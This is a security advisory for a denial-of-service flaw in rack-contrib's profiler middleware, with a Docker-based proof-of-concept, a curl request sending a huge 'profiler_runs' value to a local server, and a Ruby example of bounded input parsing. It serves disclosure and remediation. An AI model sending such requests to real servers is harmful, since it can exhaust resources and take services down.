GHSA-8c8q-2xw3-j869

Published: 28 May 2024
Source: github
GitHub: Reviewed
CVSS3: 8.6

Description

rack-contrib vulnerable to Denial of Service due to the unconstrained value of the incoming "profiler_runs" parameter

Summary

The following Ruby code is vulnerable to denial of service because the user-controlled `profiler_runs` value is not constrained by any limit, so a single request can make the server allocate resources without bound (CWE-770).

runs = (request.params['profiler_runs'] || @times).to_i
result = @profile.profile do
  runs.times { @app.call(env) }
end

A request such as `curl --fail "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"` may cause resource exhaustion through a remotely controlled value.
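To make the defect and its fix concrete, here is an added, self-contained Ruby example (not code from rack-contrib or the advisory author). It models the run-count computation shown above in two forms: the unbounded `to_i` from the vulnerable snippet, and a hardened variant that parses the value strictly and rejects anything outside a configured ceiling. The constant `MAX_PROFILER_RUNS`, the class names and the `simulate` helper are assumptions for illustration; the page does not state what limit the 2.5.0 patch chose, so pick one that fits your own profiling workload.

```ruby
require 'cgi'

# Assumed ceiling for profiler runs (hypothetical; the actual patched value
# is not given on the advisory page).
MAX_PROFILER_RUNS = 100

# Constructed model of the vulnerable logic: the run count comes straight
# from the query string via to_i, with no upper bound at all.
class UnboundedRunCount
  def initialize(default_times = 1)
    @times = default_times
  end

  # Mirrors `(request.params['profiler_runs'] || @times).to_i`
  def runs_for(query_string)
    params = CGI.parse(query_string)        # {"profiler_runs"=>["..."], ...}
    raw = params['profiler_runs'].first     # nil when the parameter is absent
    (raw || @times).to_i
  end
end

# Hardened variant: only plain decimal digits are accepted, and the parsed
# value must fall inside 1..max. Anything else is rejected (nil) so the
# caller can answer 400 instead of running the profiler at all.
class BoundedRunCount
  def initialize(default_times = 1, max_runs = MAX_PROFILER_RUNS)
    @times = default_times
    @max = max_runs
  end

  def runs_for(query_string)
    params = CGI.parse(query_string)
    raw = params['profiler_runs'].first
    return @times if raw.nil?                 # parameter absent: use default
    return nil unless raw.match?(/\A\d+\z/)   # no sign, no float, no junk
    n = raw.to_i
    return nil unless (1..@max).cover?(n)     # reject 0, negatives, and > max
    n
  end
end

# Simulated request handling: counts how often the inner app would be called
# (stands in for `runs.times { @app.call(env) }`).
def simulate(counter_class, query_string)
  runs = counter_class.new.runs_for(query_string)
  return { status: 400, calls: 0 } if runs.nil?
  calls = 0
  runs.times { calls += 1 }
  { status: 200, calls: calls }
end

if __FILE__ == $0
  hostile = 'profiler_runs=9999999999&profile=process_time'   # constructed input
  puts "unbounded would run #{UnboundedRunCount.new.runs_for(hostile)} times"
  puts "bounded answers #{simulate(BoundedRunCount, hostile)}"
  puts "bounded with 7:   #{simulate(BoundedRunCount, 'profiler_runs=7')}"
end
```

The important design choice is that the hardened path never lets a user-supplied integer reach `times` unchecked: the regex rules out anything `to_i` would silently coerce (signs, floats, trailing text), and the range check makes the ceiling explicit rather than relying on clamping. Rejecting with 400 also leaves a clear signal in access logs when someone probes the parameter.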

PoC

Herein the config.ru file:

require 'rack'
require 'rack/contrib'

use Rack::Profiler # if ENV['RACK_ENV'] == 'development'

# Define a Rack application
app = lambda do |env|
  # Your application logic goes here
  [200, {}, ["Hello World"]]
end

# Run the Rack application
run app

A Dockerfile:

# Use the official Ruby image as a base
FROM ruby:latest

# Set the working directory inside the container
WORKDIR /app

# Copy the custom config.ru file into the container
COPY config.ru .
COPY Gemfile .

# Install rack and the gems needed to run the app
RUN bundle install

# Expose the port that rackup will listen on
EXPOSE 9292

# Run rackup when the container starts
ENTRYPOINT ["rackup","--host","0.0.0.0","--port","9292"]

# Health check
HEALTHCHECK --interval=3s --timeout=10s --start-period=2s --retries=3 CMD curl --fail http://localhost:9292/ || exit 1

A Gemfile:

source 'https://rubygems.org'
gem 'rack', '~> 2.0'
gem 'rack-contrib', '~> 2.4'
gem 'rackup'
gem 'ruby-prof'

A Docker Compose file:

services:
  app:
    build:
      context: .
    ports:
      - "9292:9292"

To run the PoC:

docker compose up --build

To trigger the DoS:

curl "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"

Impact

  • Potential denial of service by remotely user-controlled data.

Packages

Name: rack-contrib (rubygems)
Affected versions: < 2.5.0
Fixed version: 2.5.0

EPSS

Percentile: 33%
Score: 0.00131
Low

CVSS3

8.6 High

Weaknesses

CWE-770

Related vulnerabilities

CVSS3: 8.6
ubuntu
more than 1 year ago

rack-contrib provides contributed rack middleware and utilities for Rack, a Ruby web server interface. Versions of rack-contrib prior to 2.5.0 are vulnerable to denial of service due to the fact that the user controlled data `profiler_runs` was not constrained to any limitation. This would lead to allocating resources on the server side with no limitation and a potential denial of service by remotely user-controlled data. Version 2.5.0 contains a patch for the issue.

CVSS3: 8.6
nvd
more than 1 year ago

rack-contrib provides contributed rack middleware and utilities for Rack, a Ruby web server interface. Versions of rack-contrib prior to 2.5.0 are vulnerable to denial of service due to the fact that the user controlled data `profiler_runs` was not constrained to any limitation. This would lead to allocating resources on the server side with no limitation and a potential denial of service by remotely user-controlled data. Version 2.5.0 contains a patch for the issue.

CVSS3: 8.6
debian
more than 1 year ago

rack-contrib provides contributed rack middleware and utilities for Ra ...
